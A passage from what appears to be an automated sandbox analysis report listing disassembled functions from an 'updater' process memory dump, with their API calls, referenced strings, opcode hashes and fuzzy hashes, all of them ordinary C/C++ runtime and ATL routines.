                                      • Part of subcall function 013F70FE: std::_Lockit::~_Lockit.LIBCPMT ref: 013F7180
                                    • _Find_elem.LIBCPMT ref: 013F8864
                                    Strings
                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 013F86BA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                    • API String ID: 2124549159-2799312399
                                    • Opcode ID: 137461ec4234aac6105011ae2abc95f1761cf9169dd1141e63fb2c33dbd41de3
                                    • Instruction ID: 84377cf7fa3ee6b4aace565be8dabf752f2fa900d3ff65a3a49c703dd3a8d0ae
                                    • Opcode Fuzzy Hash: 137461ec4234aac6105011ae2abc95f1761cf9169dd1141e63fb2c33dbd41de3
                                    • Instruction Fuzzy Hash: BDD1B370D043899EEF1ADBACC490BEDBFB5AF55318F28409DD6856F282CB349949CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 014004AA
                                      • Part of subcall function 013FC8C4: std::_Lockit::_Lockit.LIBCPMT ref: 013FC8D5
                                      • Part of subcall function 013FC8C4: int.LIBCPMT ref: 013FC8EC
                                      • Part of subcall function 013FC8C4: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC946
                                    • _Find_elem.LIBCPMT ref: 014006FA
                                    Strings
                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 01400521
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                    • API String ID: 2124549159-2799312399
                                    • Opcode ID: a340009bb101da33d3f97b75ba703271a59555c675ea25125c1d4dbc868adf55
                                    • Instruction ID: 634e94782a755ea81613a9017b503f7a77c6f2bb890d3d2d7ef1fc1d818c8c34
                                    • Opcode Fuzzy Hash: a340009bb101da33d3f97b75ba703271a59555c675ea25125c1d4dbc868adf55
                                    • Instruction Fuzzy Hash: B4D1C031D042598EEF27DF6AC8447EDBBB2BF54354F1440ABE8896B2D2DB348985CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 014008CD
                                      • Part of subcall function 013FC959: std::_Lockit::_Lockit.LIBCPMT ref: 013FC96A
                                      • Part of subcall function 013FC959: int.LIBCPMT ref: 013FC981
                                      • Part of subcall function 013FC959: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC9DB
                                    • _Find_elem.LIBCPMT ref: 01400B1D
                                    Strings
                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 01400944
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                    • API String ID: 2124549159-2799312399
                                    • Opcode ID: 2e99af9c240b630c42cd10252d8cfe0e2a72144571c7b132114cb6e3a661cfe4
                                    • Instruction ID: 249d4551d061d67ec45c790cd27a4a3230f8f810f8b21b91d3e36c0acb8c50bf
                                    • Opcode Fuzzy Hash: 2e99af9c240b630c42cd10252d8cfe0e2a72144571c7b132114cb6e3a661cfe4
                                    • Instruction Fuzzy Hash: 34D19330D042598EEF269FA9C8547EDBBB1BF15354F1481ABE8896B2D2DB3448C5CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 0141AC0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: 20323f72399cd6aca6f77d42719c1376b99cd7f01b07119f435428fe711a64cf
                                    • Instruction ID: 38dbdf1e38a713a0c9780772fdf6dd6fab7485a32159106f368f51416ef6001a
                                    • Opcode Fuzzy Hash: 20323f72399cd6aca6f77d42719c1376b99cd7f01b07119f435428fe711a64cf
                                    • Instruction Fuzzy Hash: B5516871A0A14287DB22772CDA0037B3BA5AF60702FB44D6BE195473BDEB3584D68B46
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 3732870572-1956417402
                                    • Opcode ID: fcd62588a22f11f793a42950af8d2244f4fb8be4e6e68cacb313f63ea91f23a4
                                    • Instruction ID: c0915bb89b18d7e1449149f035c7c21c9e128d7f36e89b2551052550730988a3
                                    • Opcode Fuzzy Hash: fcd62588a22f11f793a42950af8d2244f4fb8be4e6e68cacb313f63ea91f23a4
                                    • Instruction Fuzzy Hash: 0751C430A04685DADF27CEAE94C17BFBFB5AF45210F0442FBE591973E1D27485829B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 014079B2
                                    • swprintf.LIBCMT ref: 01407A24
                                      • Part of subcall function 013FC009: std::_Lockit::_Lockit.LIBCPMT ref: 013FC01A
                                      • Part of subcall function 013FC009: int.LIBCPMT ref: 013FC031
                                      • Part of subcall function 013FC009: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC08B
                                      • Part of subcall function 01404907: _wmemset.LIBCMT ref: 0140492A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$H_prolog3_Lockit::_Lockit::~__wmemsetswprintf
                                    • String ID: %.0Lf
                                    • API String ID: 3799663735-1402515088
                                    • Opcode ID: 8cdd719c5ab3563041a7118177b3f4b218ac57900ca6e0af59cc5101495895ca
                                    • Instruction ID: 93d7f07ee4cb4de0f0f34ebb6d661b425e64baa442d8a38aa9a61f9826d4706b
                                    • Opcode Fuzzy Hash: 8cdd719c5ab3563041a7118177b3f4b218ac57900ca6e0af59cc5101495895ca
                                    • Instruction Fuzzy Hash: 6751BE71D00209AFCF06DFD5D844AEDBBB5FF08311F10441AE945AB2A4EB35A945CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %.2x
                                    • API String ID: 0-936724101
                                    • Opcode ID: 679c500c8f70747352a9641c5cd8a4c6b3812fede3707d55356ad05638f754d9
                                    • Instruction ID: 342a1bff8eb27bf39e6273a468f9187f0bbe360ef7045818abc90d47eee6f9ab
                                    • Opcode Fuzzy Hash: 679c500c8f70747352a9641c5cd8a4c6b3812fede3707d55356ad05638f754d9
                                    • Instruction Fuzzy Hash: B651EF72A04B42EFD714CF6CD481BA0BBB5BF59314F1481AAD948CBA96E330E551CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 0140C413
                                    • swprintf.LIBCMT ref: 0140C485
                                      • Part of subcall function 013F6F3F: std::_Lockit::_Lockit.LIBCPMT ref: 013F6F50
                                      • Part of subcall function 013F6F3F: int.LIBCPMT ref: 013F6F67
                                      • Part of subcall function 013F6F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 013F6FC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$H_prolog3_Lockit::_Lockit::~_swprintf
                                    • String ID: %.0Lf
                                    • API String ID: 2921955253-1402515088
                                    • Opcode ID: 399fd9eefeac3e51af76779135b7adf13aa3735b53482d53405e328e842b44a5
                                    • Instruction ID: 236217a25ba3cd7511825acff1544c0cabb86f84d54c60c19389449959e0b65b
                                    • Opcode Fuzzy Hash: 399fd9eefeac3e51af76779135b7adf13aa3735b53482d53405e328e842b44a5
                                    • Instruction Fuzzy Hash: DB518AB1D00209EFCB0ADFD4C884AEDBBB5FF18310F10456AE845AB2A4DB359955CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 014117CB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 2118026453-2084237596
                                    • Opcode ID: d1f6a7d90d5111c47c92f9730ff92609a85398bde65663dfd125c4a137dc6611
                                    • Instruction ID: 86b66f1a92fbd549a5f4daa26d99ee7a888a6c37967d61866268a74895e9aec5
                                    • Opcode Fuzzy Hash: d1f6a7d90d5111c47c92f9730ff92609a85398bde65663dfd125c4a137dc6611
                                    • Instruction Fuzzy Hash: E1418D72900209AFDF16DFA8CD80AEEBBB5FF48704F18816AFE0467269D3359950DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prolog3___cftoe
                                    • String ID: !%x
                                    • API String ID: 855520168-1893981228
                                    • Opcode ID: cb90704033225a7312ff8d9949948b59ea563cd9b80c7bc4ee01f55d7fda37bd
                                    • Instruction ID: 6f5cf865db72b70f4bd2dc64a3652b0004d15ca39364182b7c353aa091d68b0b
                                    • Opcode Fuzzy Hash: cb90704033225a7312ff8d9949948b59ea563cd9b80c7bc4ee01f55d7fda37bd
                                    • Instruction Fuzzy Hash: 49312AB1D0120EAFCF05EF99E980AEEB7B5FF18314F10442AF504A72A1D735AA55CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013FB5E6: _Maklocstr.LIBCPMT ref: 013FB606
                                      • Part of subcall function 013FB5E6: _Maklocstr.LIBCPMT ref: 013FB623
                                      • Part of subcall function 013FB5E6: _Maklocstr.LIBCPMT ref: 013FB640
                                      • Part of subcall function 013FB5E6: _Maklocchr.LIBCPMT ref: 013FB652
                                      • Part of subcall function 013FB5E6: _Maklocchr.LIBCPMT ref: 013FB665
                                    • _Mpunct.LIBCPMT ref: 0140262F
                                    • _Mpunct.LIBCPMT ref: 01402649
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Maklocstr$MaklocchrMpunct
                                    • String ID: $+xv
                                    • API String ID: 542472742-1686923651
                                    • Opcode ID: 6d4780d07cfce3a313bb0c3cce5da8bddaecd6089f75bf559dbeb58f768be68c
                                    • Instruction ID: 2749ac9d1cbe2d442d0edf9fc5a7dc0f99c45b9fea4b282538dd8dc0964e7232
                                    • Opcode Fuzzy Hash: 6d4780d07cfce3a313bb0c3cce5da8bddaecd6089f75bf559dbeb58f768be68c
                                    • Instruction Fuzzy Hash: F121B5B1504A526ED726DF76C884B3BBEE8AB18200F04091FE159C7A90D774E601CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Mpunct
                                    • String ID: $+xv
                                    • API String ID: 4240859931-1686923651
                                    • Opcode ID: e93eb0c8747d0e5a48521fe47b1fb419fc64b1e80a7f8b71d1d0e598ff45dc3a
                                    • Instruction ID: e3dc3dd633383e81dab12a4b8e9a00ab301cbae4b5e7e324914241303c8e4bcc
                                    • Opcode Fuzzy Hash: e93eb0c8747d0e5a48521fe47b1fb419fc64b1e80a7f8b71d1d0e598ff45dc3a
                                    • Instruction Fuzzy Hash: D821B2B1904B526ED722DF76889073BBFF8AB1C200F140A6FE599C7A90D734E641CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prolog3_
                                    • String ID: false$true
                                    • API String ID: 2427045233-2658103896
                                    • Opcode ID: eafcef69088d0f91073879bacb7e2a6d03b40b899580ef70039f3eb266d0c052
                                    • Instruction ID: 919750870ec6483b6a1d9b1ad0aef85dd1ff901371a245958a434ba3c4ad1cde
                                    • Opcode Fuzzy Hash: eafcef69088d0f91073879bacb7e2a6d03b40b899580ef70039f3eb266d0c052
                                    • Instruction Fuzzy Hash: A011D3B19407459EC725EFB9D401B8AB7F4AF29200F14855FE2A5D7690DB70E5049B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %!.15g$%lld
                                    • API String ID: 4218353326-2983862324
                                    • Opcode ID: a0b56c9d5476707d7db0d7cfa5fba181d3f432fa0f62c172376cf485fcdf5909
                                    • Instruction ID: 65e71123b29d70fe108088bd228ebba39cc31c13253c6e7fac5d4e756f57aec5
                                    • Opcode Fuzzy Hash: a0b56c9d5476707d7db0d7cfa5fba181d3f432fa0f62c172376cf485fcdf5909
                                    • Instruction Fuzzy Hash: 2CF02872A14B056AE3305F9EAC01A13B7E8EF99B14F00071FF5CD92551EAB0A94587E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013B4317: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014506B0,013CF491,?,013CE301,80070057,?,013CF491,00000001), ref: 013B431D
                                      • Part of subcall function 013B4317: GetLastError.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014506B0,013CF491,?,013CE301,80070057,?,013CF491,00000001), ref: 013B4327
                                    • IsDebuggerPresent.KERNEL32(?,?,?,013B1130), ref: 0140D974
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,013B1130), ref: 0140D983
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0140D97E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 3511171328-631824599
                                    • Opcode ID: 715f8e16c6700d3f46eb1e652ed6f65850a285c58d5cb2a2495e12ee88bbb604
                                    • Instruction ID: 1a0fbdcd4b544d0307fbfbcef991e40afdf253a69fbdfa3a886affe524b90276
                                    • Opcode Fuzzy Hash: 715f8e16c6700d3f46eb1e652ed6f65850a285c58d5cb2a2495e12ee88bbb604
                                    • Instruction Fuzzy Hash: 10E06DB46007018BD7319FAAD544382BBE5AB04708F04892ED8A6C6764E7B0D448CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%